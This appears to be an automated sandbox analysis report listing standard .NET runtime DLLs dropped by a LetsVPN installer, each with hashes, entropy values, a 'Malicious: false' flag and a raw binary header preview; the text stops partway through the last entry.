Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....K............" ..0..N...........l... ........... ..............................w_....`................................._l..O....................X...+..........pk..T............................................ ............... ..H............text....L... ...N.................. ..`.rsrc................P..............@..@.reloc...............V..............@..B.................l......H.......<%...,...........Q.......j.......................................~......0..........(....,....(.....o.......&......................0...........(.......(....-..,....(....,.r...p......%...%...(......(.....(....,.r...p......%...%...%...(.......(.....(....,!r...p......%...%...%...%...(........(......,&(....,..r...pr...p.(....(......(......(....,.r...p......%...%...(.......(.....(....,.r...p......%...%...%...(........( ....(....,"r...p......%...%...%...%..

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Diagnostics.FileVersionInfo.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16360
Entropy (8bit):	6.905579148221384
Encrypted:	false
SSDEEP:	384:a6oWJjWckpwKANynsAw/98E9VF3AM+oCwJ+:a6vDAw/KENAMx7+
MD5:	0B74447C2E887EB2E968860C38849B01
SHA1:	0EEB20D6307B9F9D72744D371B5FCEF7E7BBC039
SHA-256:	AB94EDBA42955F58694057C0992E158A2AB1D4865E1AA9B4C2ED93A06077A5E3
SHA-512:	FB9DD055D5D326D89C09B99C7AD0EBD85F496327A300EA8125F64A4454D9973B8F18A418376004070117E3934E76743337B7F70184DD44DB68DB35F135CA8A91
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............(... ...@....... ...............................0....@.................................H(..O....@..p................+...`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc...p....@......................@..@.reloc.......`......................@..B................\|(......H.......P ..@....................&......................................BSJB............v4.0.30319......l...\|...#~......(...#Strings............#US.........#GUID...$.......#Blob......................3......................................z...............\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.$...C.?...K._...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Diagnostics.PerformanceCounter.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	42472
Entropy (8bit):	6.0216340679855485
Encrypted:	false
SSDEEP:	384:KGAHVcV8a5cg1YeEBfVmVYSGS4W+FyLVRVStbaB/PRTlBRBMJnnvnL0++WYbWAyw:KTyj5cKJfE+MJnnvnL0jRAw/KENAMxb
MD5:	D358480B44628F3013578D394BD4B09C
SHA1:	B0D59D0D89D31D8EB502D81E6A24089AD711F2A8
SHA-256:	FDA5CCB3340509E4D365F4CFEAD3EEC08D24D2BE5DD01CB07CDEC1518543FA87
SHA-512:	38C973BF5932CC6046DF9354E11722ECA4CF3563B22227E81E5C5D1E194AC667290A98DAFCE530FF8F90AB6D05880EC843424500B808AA91EC62B54FAE7D15B6
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....D..........." ..0..n.............. ........... ..............................7.....`.....................................O....................z...+..............T............................................ ............... ..H............text....l... ...n.................. ..`.rsrc................p..............@..@.reloc...............x..............@..B........................H.......\&...5...........\...............................................~......0..........(....,....(.....o.......&......................0...........(.......(....-..,....(....,.r...p......%...%...(......(.....(....,.r...p......%...%...%...(.......(.....(....,!r...p......%...%...%...%...(........(......,&(....,..r...pr...p.(....(......(......(....,.r...p......%...%...(.......(.....(....,.r...p......%...%...%...(........(.....(....,"r...p......%...%...%...%..

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Diagnostics.Process.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16872
Entropy (8bit):	6.8363078970914115
Encrypted:	false
SSDEEP:	384:3qk53/hW3fZ+zWzZ9pwKANynsAw/98E9VF3AM+oe2wTa:3qk53MJkAw/KENAMxD
MD5:	AB50D9C2F672BA5FEC55ED5E3524FD1F
SHA1:	122ECA53082B37F12E75751EF6D2F63AA2811957
SHA-256:	AB4DBF17D93331202D45C68B9479424638AF41AEFECC8800A1801F3213E2089F
SHA-512:	C9BADB8432493A0216DBCF5F3044423E1964BC7B5EE94E2A6E497A1AE0D4C0BE63F76CA302F1FBC83E8B345495DD4EB862872C9A16B2D4ADA6F6A5D22C129301
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0.............*... ...@....... ...............................q....@..................................)..O....@..0................+...`.......(............................................... ............... ..H............text...0.... ...................... ..`.rsrc...0....@......................@..@.reloc.......`......................@..B.......................H.......P ...................... (......................................BSJB............v4.0.30319......l...$...#~..........#Strings............#US.........#GUID...........#Blob......................3............................................................j.q.........~.................}.....3.....L.................g.....P...................k.....k.....k...).k...1.k...9.k...A.k...I.k...Q.k...Y.k...a.k...i.k...q.k.......................#.....+.....3.....;.....C.7...K.W...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Diagnostics.StackTrace.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	18920
Entropy (8bit):	6.722436960395853
Encrypted:	false
SSDEEP:	384:aFCc4Y4OJWfOWqWWOWWLpwKANynsAw/98E9VF3AM+of9G/dGfWu049mF:KCcyC7Aw/KENAMx1G/w+ZAs
MD5:	9D6A5AFA7B4C436069F565AA91039A19
SHA1:	DD26015024E3E30B5D652CBA1E498C8DF0A27DA5
SHA-256:	BDBC0B52C46193E1C26271C94C49BF3FC7CAE21005926D3DD41A8E084256B2C3
SHA-512:	B8BF0EF60B8BB23DEA5D30952398DA9F6AD0E8B850535575827909D0B3AC11FCB487EDB899BA47354D12EEB4A6074D1C585A6D9A9E82B0A99B088DD57CBAC634
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0.............N.... ...@....... ..............................l.....@..................................-..O....@...................+...`......L-............................................... ............... ..H............text...T.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................0.......H........ ..4....................,......................................F.(....~....(....6.o.....(....6.o..........*.o........~.....~.....BSJB............v4.0.30319......l.......#~..<.......#Strings.... .......#US.(.......#GUID...8.......#Blob...........GU.........3..................................................8.........*.h...m.h.....Z.....$...........Z...+.\|.....Z...1.Z.....$.....$.......3.D.......\|...F.\|...c.\|.....\|.....\|.....\|.....\|.....\|.....Z...I.\|...}.Z.....Z.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Diagnostics.TextWriterTraceListener.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16360
Entropy (8bit):	6.931910682226578
Encrypted:	false
SSDEEP:	384:7AWxMWYtpwKANynsAw/98E9VF3AM+o05hc:7vBAw/KENAMxEc
MD5:	3A4550B4EAA5BE9635A8CF5E131C5C9B
SHA1:	2A36E204DD2FFB785C6E29D9D8A9CE44E41C50A9
SHA-256:	C3150F991A99712C300EA2D6D201CC8820435901EDFC7F2D6D3631DC6DF91E63
SHA-512:	0087787B7B587854BE0CE5C97825B1D67E67215026C11BC885330792AA9AB80CC4CEE53F410A547AE998FBED037ED5BE0F614907961E989D113540927012E8FB
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............(... ...@....... ..............................._....@..................................(..O....@...................+...`......L'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......P ..\|....................&......................................BSJB............v4.0.30319......l.......#~......P...#Strings....D.......#US.H.......#GUID...X...$...#Blob......................3......................................z...........!...\.!...0.....A.....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.,...C.G...K.g...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Diagnostics.Tools.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16360
Entropy (8bit):	6.9059125920410835
Encrypted:	false
SSDEEP:	384:MAlcWHaWvKpwKANynsAw/98E9VF3AM+oj35hp:l9jAw/KENAMxVf
MD5:	361D41D8F1F07906BDE089C94843158D
SHA1:	A17D4F88FFFE696562FD32C0C3943991EE1576E4
SHA-256:	BEF84DD0B858D01B7C898123D317C29C0C0CA3478DB4BD6730FB7ADA669BEC30
SHA-512:	C379B389A4EF2B247D3C02F570A9F588696785EC192458033D7BC0F77895BD4110F6C73ECAF3E77A598F96B1B6D7A6D455F38EEF9D9DDF534F937741D9A34E3E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............(... ...@....... ....................................@..................................(..O....@.. ................+...`......d'............................................... ............... ..H............text........ ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~......\|...#Strings....p.......#US.t.......#GUID...........#Blob......................3............................................................`.....1.....t.................s.....).....B.................].........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.5...K.U...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Diagnostics.TraceSource.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16872
Entropy (8bit):	6.838816731651097
Encrypted:	false
SSDEEP:	384:mTIZnWlNWezpwKANynsAw/98E9VF3AM+oFZl2Gz:GUyYAw/KENAMxJz
MD5:	4550792542C63094619622171E3C054D
SHA1:	C7975AE3610B6C59C20AA7ED72CBA791899672E7
SHA-256:	2777056938AE552F488FADB053462C184B3E6D4B29FEFD1EE58A518ED1E9F7BB
SHA-512:	8DA3DDA43A5D2C3D33E2467CAE18C3BD6D86A1547CB2F026EF543A6520550442F34FF7794F76E6A942ADAE8F3FB7F2C17CEFA81C52361D30CE129E9F93D70940
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0.............2... ...@....... ...............................a....@..................................)..O....@..P................+...`.......(............................................... ............... ..H............text...8.... ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.......................H.......P ......................((......................................BSJB............v4.0.30319......l...\...#~..........#Strings............#US.........#GUID...........#Blob......................3............................................................t...................................=.....V.................q.....Z...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;. ...C.;...K.[...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Diagnostics.Tracing.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	26600
Entropy (8bit):	6.549745891932712
Encrypted:	false
SSDEEP:	384:0lQnCMi33333333kj8xe+5PTYM3zUy+CezHjzgKj0uRWOdWmWJdWwApwKANynsAs:yQq33333333kX+TBi8FAw/KENAMx3
MD5:	5034E9355F31E37FAFD1C61CA444683E
SHA1:	A57102C41A2E6E8A9C0F264CDC901DFE5418384B
SHA-256:	F1042347072E49C6A00F8F24ABE38EA0C557DECC135B6F2DB48C627CF178A746
SHA-512:	293D58075357259794D053DF2F01C39FF9CA6D05EFF5E05DD3C224547FA603E8D40E9E1D7A366711DDB2185007514FBE660B904623F8B86A227B194B9A2F922D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0.............RM... ...`....... ....................................@..................................L..O....`..x............<...+..........PL............................................... ............... ..H............text...X-... ...................... ..`.rsrc...x....`.......0..............@..@.reloc...............:..............@..B................3M......H.......8...!...................K.......................................0..H........(.....-.r...ps....z.-.r...ps....z.(......}......(#...}.....{.....o...."..(........0..Z.............%.r#..p.%..{.....%.rA..p.%..{..........%.rS..p.%..{....l.{....l[...ra..p(.....(....&...{.....0..4.................}......+....{.....".......X.....{.....i2..0..k..........{........{..........."....(.......X....{.....i.0%.(..........(.....(.......,..(........"....3.....}....*.......=..M......

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Drawing.Common.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	55272
Entropy (8bit):	5.900626916792861
Encrypted:	false
SSDEEP:	1536:8JbgUxvrIn01EkO/69KzwmOiGeCcSP8UIrDAwrxe:81xvrInsEkO/AKzwm3C0UODhg
MD5:	689032F264346A94F2EFE676D797FB88
SHA1:	EAE2E0F39A499089EF3827EA1598D50898DC792A
SHA-256:	C2D38D015AA22D59F2159408075883CAC1B902BC4EECE170A12095FA983FF116
SHA-512:	32093F3F96E3AD62F444EFD1068C6AFB3C9E8953186B8A3D89C6F10B6613973BC4212A9B956753DF25D83128FEB58931F5F9F125483A105D621996F2C305EE1D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0.............n.... ........... ..............................?,....`.....................................O........................+..........8...T............................................ ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................O.......H........)...\...............6...........................................~......0..........(....,....(.....o.......&......................0...........(.......(....-..,....(....,.r...p......%...%...(......(.....(....,.r...p......%...%...%...(.......(.....(....,!r...p......%...%...%...%...(........(......,&(....,..r...pr...p.(....(......(......(....,.r...p......%...%...(.......(.....(....,.r...p......%...%...%...(........(.....(....,"r...p......%...%...%...%..

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Drawing.Primitives.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16360
Entropy (8bit):	6.905329079129804
Encrypted:	false
SSDEEP:	384:/28YFlXulWY/W3ypwKANynsAw/98E9VF3AM+ohHpSmd5kt:/0qqAw/KENAMxhJSmot
MD5:	A8634436A0BC5D272D023ACE72EF6959
SHA1:	9F1B7980EC924D0616D59AD28CDFCC1C1A839C1F
SHA-256:	F635D498E723FB968A7EAA95E5564CC9A77A77046071EED4C0C7C69036B56451
SHA-512:	1EE356541F1AE8DC43E5CAA72377E2DC050C9B29545B7B36EC2143B44DBF7824359650A64DCE4FB21A1F299BD657E3F9F1828BFDB6A7183DD0077E1810583A72
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............(... ...@....... ...................................@..................................(..O....@.. ................+...`......t'............................................... ............... ..H............text........ ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~..,...P...#Strings....\|.......#US.........#GUID...........#Blob......................3......................................................~.....R..... .....f.................e...........4.....}...........O.....8...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.6...K.V...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Dynamic.Runtime.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	17384
Entropy (8bit):	6.79150562858462
Encrypted:	false
SSDEEP:	384:2uMLcdQ5MW9MWtNpwKANynsAw/98E9VF3AM+ojzVHu:LOcSpgAw/KENAMxQ
MD5:	E06B61339229A0A9308D6CDA9122380B
SHA1:	81CC02F1B090C3C137813F10D33C59101117F19C
SHA-256:	D74F95419BDA91BCC54428BEA8ED6F2A3B41A2F3F3F273E48A29F92669A59231
SHA-512:	1100C5D29EF8688DED4F26AA26A3C18E425C0039E3286E148BED2867314105E40081CC9F847605F98E1C593DADAA200320817A358CDA6EA5433CE35F543034A6
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............,... ...@....... ....................................@..................................+..O....@...................+...`...................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................,......H.......P .............................................................BSJB............v4.0.30319......l.......#~..p...0...#Strings............#US.........#GUID...........#Blob......................3................................................;.........................$.....$.....$.....$...[.$...t.$.....$.....$.........g.$.....#...........e.....e.....e...).e...1.e...9.e...A.e...I.e...Q.e...Y.e...a.e...i.e...q.e.......................#.....+.....3.....;.....C.3...K.S...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Globalization.Calendars.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16872
Entropy (8bit):	6.866265875014329
Encrypted:	false
SSDEEP:	384:vZ7RqXWDRqlRqj0RqFWzapwKANynsAw/98E9VF3AM+o86luOy/3e:x9qKqjqjuq0Aw/KENAMxqe
MD5:	552E2E95235E7AEA3AB4D5106B66CC8F
SHA1:	52749321CA826CE32F892D2FACF053445E8DF58B
SHA-256:	CB7737E253D6D9182DF83B54DDD98034E4652A691B0DC0FCFA3971F5ACE00833
SHA-512:	C5BC008D5621FAB4226D6BB9E066E8C9E63F200E034C716D785C2495F48A8F4DBA6FD369AB5E3D34C78F8F50E22B3FF249C4D5095FC5EDE53C150DB66E1787C7
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0................. ...@....... ....................................@.................................X..O....@..P................+...`...... )............................................... ............... ..H............text........ ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................*......H.......P ..P....................(......................................BSJB............v4.0.30319......l...L...#~......l...#Strings....$.......#US.(.......#GUID...8.......#Blob......................3......................................z...............\.....0.....%.....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;. ...C.;...K.[...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Globalization.Extensions.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	20968
Entropy (8bit):	6.684112746735289
Encrypted:	false
SSDEEP:	384:PNBMbljRC+lgfS1RPWYR1Rw0R9WYRPWYRDRj0R9WW0pwKANynsAw/98E9VF3AM+P:PvMhF2SzNzwu/NljuHAw/KENAMxSN
MD5:	4CA24D89C5A6DC157E0A3F5FE569DC3F
SHA1:	352D52544989632075AD6979EF6FC4DC21D6AE8A
SHA-256:	ADE7F4A02B90EC046B8E28837D28CED17C38E4FAACD451833F4E4FD8CC14850A
SHA-512:	E56F29322BFF81F832E04C025CAC53220F007F4E831ADFAFECCD222971B18B6C383837F49F47A4F195BB9F34F0E3AC33CD6F7D66E06D7FDA3C1686A1B84A1705
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..............6... ...@....... ...............................0....@.................................a6..O....@...............&...+...`.......5............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......$..............@..B.................6......H........"..H............4......(5........................................o...."..o......o...."..o....j~....%-.&(....s....%........0..$.........(.....o.......&...,....o....,.....................,!(....,..r...p.(....(......(......(....,.r...p......%...%...(......(.....(....,.r...p......%...%...%...(.......(.....(....,!r...p......%...%...%...%...(........(....2r...p.(..........(.......0..K........-.r1..ps....z. ...@3.(..... ....3.(....*. ...._,.(....rI..ps..

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Globalization.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16360
Entropy (8bit):	6.9524284524501185
Encrypted:	false
SSDEEP:	384:TZ4RLWdRfRJ0RZWuTpwKANynsAw/98E9VF3AM+oTEeygsJ:TZK0pJucAw/KENAMxAVg6
MD5:	3A50AAF4EC343B88ACC10F59C187E16F
SHA1:	BF6EE730359B2ED2DC0B24FAED1DCCC07982053F
SHA-256:	D08709FFF794C82D6142F7BE64DAA96EB190244BB1816222167FF3FDFA7439C0
SHA-512:	EFB911533062B823C56FB4C1D6DF8E02006399904C96540905D8010903ADCF6A6B214D0E4A3F98E71B5CCFDBF1EF2BD1CFBBF965E267B6BB9DAA0BCC3F785F20
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............)... ...@....... ..............................h.....@..................................)..O....@...................+...`......h(............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H.......P .......................'......................................BSJB............v4.0.30319......l...0...#~..........#Strings....x.......#US.\|.......#GUID...........#Blob......................3......................................................m.....A.{.........U.................T...........#.....l...........>.....'...................u.....u.....u...).u...1.u...9.u...A.u...I.u...Q.u...Y.u...a.u...i.u...q.u.......................#.....+.....3.....;.....C.1...K.Q...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.IO.Compression.ZipFile.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16360
Entropy (8bit):	6.853001096633939
Encrypted:	false
SSDEEP:	384:kYWsmW9VpwKANynsAw/98E9VF3AM+o2DJKrP:k26Aw/KENAMxiyP
MD5:	00BC2B6B3B4DC2C838C6044165B2BCA1
SHA1:	194B35894C238E9C07F03381D95A83EB41370DF0
SHA-256:	AD0B8F872A39661BEA96D21951B42F732BA1C666AB14C246271D734B0F9900B4
SHA-512:	DD4221AB70A39477D474A8780E6BEF36FCAC1C1A7CE275CDD4171B2E00044B2D78333419626E0D99A7F3AB1DF9EB8A9E2E24BB40B3E3494F4D568077D0C24082
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0.............*(... ...@....... ....................................@..................................'..O....@..@................+...`.......&............................................... ............... ..H............text...0.... ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B.................(......H.......P ...................... &......................................BSJB............v4.0.30319......l.......#~......D...#Strings....8.......#US.<.......#GUID...L.......#Blob......................3......................................................z.....N.....".....b.................a...........0.....y...........K.....4...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........:.....C.....b...#.k...+.k...3.k...;.....C.....K.....S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.IO.Compression.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	105960
Entropy (8bit):	6.3980318072931635
Encrypted:	false
SSDEEP:	1536:Avc/U5yNq2oS4Zd0LE3YigSFvhoZO2K3aAYH2TfXmNoJXUAwrx7:Igk1tiLMYiDFvxqrWDWNoJXUht
MD5:	7247035215659F364A9E1B0DA48F026E
SHA1:	D44B54FC1536C5BA97704F2C96AA41AFA068F22F
SHA-256:	323A5C9BB09F13197CFD1D70B8889D7BA177708665A6649D78E667F03BA1D6AB
SHA-512:	1BFAB9A14DFF325E9D2C17EE49805A12FBAA68E1B4EA84618A24574D37551865F701974D20DF693C9692D3F650DB072BE72A5C72A1A2D95A84CFE06E7F9FC24F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..d...........W... ........... ..............................%S....@.................................5W..O....................r...+...........V............................................... ............... ..H............text....b... ...d.................. ..`.rsrc................f..............@..@.reloc...............p..............@..B................iW......H........................9.......V......................................j~....%-.&(I...s....%..........0..$.........(.....o.......&...,....o....,.....................,!(....,..r...p.(....(......(......(....,.r...p......%...%...(......(.....(....,.r...p......%...%...%...(.......(.....(....,!r...p......%...%...%...%...(........(....2r...p.(....2r7..p.(....2rs..p.(....2r...p.(....2r...p.(....2r...p.(....2r=..p.(....2r_..p.(....2r...p.(....2r...p.(....*2r...

C:\Program Files (x86)\letsvpn\app-3.7.0\System.IO.FileSystem.AccessControl.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	30696
Entropy (8bit):	6.437349251984308
Encrypted:	false
SSDEEP:	384:8mjoB5y+MLi9VYp/OiRc715ZkSAcE1l2Yd5zqNz8TWgVbW0YpwKANynsAw/98E9p:DCN9VYp/OiRcnZIfk8PLAw/KENAMx84V
MD5:	50B1CBCFE5A7BCD2432873CB68256840
SHA1:	B3351E416FE20887790EFF62EB1D7BA12C88A0B4
SHA-256:	178D18A1581ED4210B4371F43E72474856E783B9474B9E10A0CFA1B0BCE1D2AC
SHA-512:	6A23D4252D5676EA5049AC69C29272C13BEEB2A6B84533FC8C3555F9F67D6E81C841074EFA708A44BAEDC1395A5244BC2AD9ED63A9580939A840F35044AC44BF
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...._............" ..0..B...........`... ........... ..............................Z.....`.................................t`..O....................L...+..........l_..T............................................ ............... ..H............text....@... ...B.................. ..`.rsrc................D..............@..@.reloc...............J..............@..B.................`......H........&..t)...........P.......^........................................(....^.(.......(...%...}....:.(......}....:.(......}....:.(......}.....~.....0..1.......(....,..%-.&...(.....o.......&...,...o....,.......................(....,.r...p......%...%...(......(.....(....,.r...p......%...%...%...(.......(.....(....,!r...p......%...%...%...%...(........(......,&(....,..r...pr...p.(....(......(......(....,.r...p......%...%...(.......(.....(....,.r...p......%

C:\Program Files (x86)\letsvpn\app-3.7.0\System.IO.FileSystem.DriveInfo.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16360
Entropy (8bit):	6.9120192483587095
Encrypted:	false
SSDEEP:	384:5Kcuz1W1cWkVpwKANynsAw/98E9VF3AM+oVHKB:ju8BAw/KENAMxi
MD5:	4C1252D60E69975F134749D98AAE7BF1
SHA1:	301AF29754DB69E9C6B9A1F51EF5596C289C81FC
SHA-256:	C9DA462E07CAA610D558B5409A76E283232453E20775010297704B7FD165CC8F
SHA-512:	F67BFDF65FB9DFE1834FE728DEB38B996AA11F29FAA41BB9522E0230B5A297A7D7F23F8EAE9C3FD4DCCB4864D5669CB3B09ED674AF92A8B3A066B7D1E1FBE520
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............(... ...@....... ...................................@..................................(..O....@..P................+...`......H'............................................... ............... ..H............text........ ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................(......H.......P ..x....................&......................................BSJB............v4.0.30319......l.......#~......H...#Strings....L.......#US.P.......#GUID...`.......#Blob......................3......................................................p.....D.....9.....X.................W...........&.....o...........A.....*...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;. ...C.;...K.[...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.IO.FileSystem.Primitives.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16360
Entropy (8bit):	6.915701572831014
Encrypted:	false
SSDEEP:	384:h+SWikWRLpwKANynsAw/98E9VF3AM+oVfWYf2Zi:h+eSAw/KENAMxo0ii
MD5:	768E795DCBA5ECB7C19405C2D0B76192
SHA1:	4BCBB19307AB780BB88368E5C2518E82813D728F
SHA-256:	03C7419B86A770DCFB6A498C082E2EAFF774914443F3E234030EA697969D393E
SHA-512:	658BCAEA968FAAA22DA1BBEFEA4D584A10B021DAE6FBBD86CA9ACA236CB114F9E359E2062248DABB74FE48EFDE5211B738539884FD3582696D06A55A8019DCB9
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............(... ...@....... ..............................e.....@..................................(..O....@..P................+...`......d'............................................... ............... ..H............text........ ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~......X...#Strings....h.......#US.l.......#GUID...\|.......#Blob......................3......................................................y.....M...........a.................`.........../.....x...........J.....3...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.!...C.<...K.\...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.IO.FileSystem.Watcher.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16360
Entropy (8bit):	6.95803756202855
Encrypted:	false
SSDEEP:	384:mAWzgWrnvpwKANynsAw/98E9VF3AM+omHs2Tojo:mtkAw/KENAMxW1t
MD5:	43FDDAE5615134C7C7CFF1ED626BE3D1
SHA1:	AAC4C804F1163324A4FF971467E5F3C06474DC07
SHA-256:	0959B36DACC9C10C8A0E1F56D6CA71D157798D3D35F03EFE271681C655CA9F9A
